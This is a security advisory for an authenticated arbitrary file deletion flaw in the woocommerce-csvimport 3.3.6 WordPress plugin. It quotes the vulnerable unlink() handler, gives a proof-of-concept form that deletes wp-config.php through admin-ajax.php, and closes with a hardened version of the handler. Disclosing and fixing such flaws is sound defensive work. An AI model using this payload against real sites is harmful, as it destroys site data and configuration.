woocommerce-csvimport 3.3.6 – Authenticated Arbitrary File Deletion

2017-12-27T00:00:00
ID WPEX-ID:9057
Type wpexploit
Reporter Lenon Leite
Modified 2019-11-01T13:12:51

Description

Type of user access: any registered user. $_POST['filename'] is passed straight to unlink() without any validation, so an authenticated user can delete arbitrary files the web server process may write.

Code file: wp-content/plugins/woocommerce-csvimport/export/include/classes/woocsvExport.php, line 64:

    public function delete_export_file() {
        if ( isset( $_POST['filename'] ) ) {
            @unlink( $_POST['filename'] );
        }
        wp_die( 0 );
    }

Result: wp-config.php is deleted and the entire site is reset.

                                        
                                            1 – Log in with any user.
2 - Execute form:
<form method="post" action="http://src.wordpress-develop.dev/wp-admin/admin-ajax.php?action=delete_export_file">
   <input type="text" name="filename" value="../wp-config.php">
   <input type="submit">
</form>
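For comparison, a hardened version of the handler quoted in the description. This is an added example, not the plugin's own code or its later patch; the export directory location, the capability name and the nonce action are assumptions.

```php
<?php
// Added example: a hardened delete_export_file() for the woocsvExport class.
// Assumptions (not from the advisory): exports live in wp-content/uploads/woocsv-exports,
// callers hold the 'manage_woocommerce' capability, and the form sends a 'nonce' field
// created with wp_create_nonce( 'woocsv_delete_export' ).
class woocsvExport {
    public function delete_export_file() {
        // 1. Authorization: any logged-in user is not enough to delete files.
        if ( ! current_user_can( 'manage_woocommerce' ) ) {
            wp_send_json_error( 'forbidden', 403 );
        }
        // 2. CSRF: the AJAX request must carry a valid nonce for this action.
        check_ajax_referer( 'woocsv_delete_export', 'nonce' );

        // 3. Input: drop every directory component, keep a plain .csv file name only.
        $filename = isset( $_POST['filename'] ) ? wp_unslash( $_POST['filename'] ) : '';
        $filename = sanitize_file_name( basename( $filename ) );
        if ( '' === $filename || 'csv' !== strtolower( pathinfo( $filename, PATHINFO_EXTENSION ) ) ) {
            wp_send_json_error( 'invalid filename', 400 );
        }

        // 4. Containment: resolve symlinks and confirm the target sits inside the export dir.
        $export_dir = realpath( WP_CONTENT_DIR . '/uploads/woocsv-exports' ); // assumed location
        $target     = ( false !== $export_dir ) ? realpath( $export_dir . '/' . $filename ) : false;
        if ( false === $export_dir || false === $target
            || 0 !== strpos( $target, $export_dir . DIRECTORY_SEPARATOR )
            || ! is_file( $target ) ) {
            wp_send_json_error( 'file not found', 404 );
        }

        // 5. Delete without the error-suppressing '@' so failures are visible in logs.
        if ( ! unlink( $target ) ) {
            wp_send_json_error( 'delete failed', 500 );
        }
        wp_send_json_success( $filename );
    }
}
```

With this version the proof-of-concept value `../wp-config.php` is reduced to `wp-config.php`, fails the extension check, and never reaches unlink().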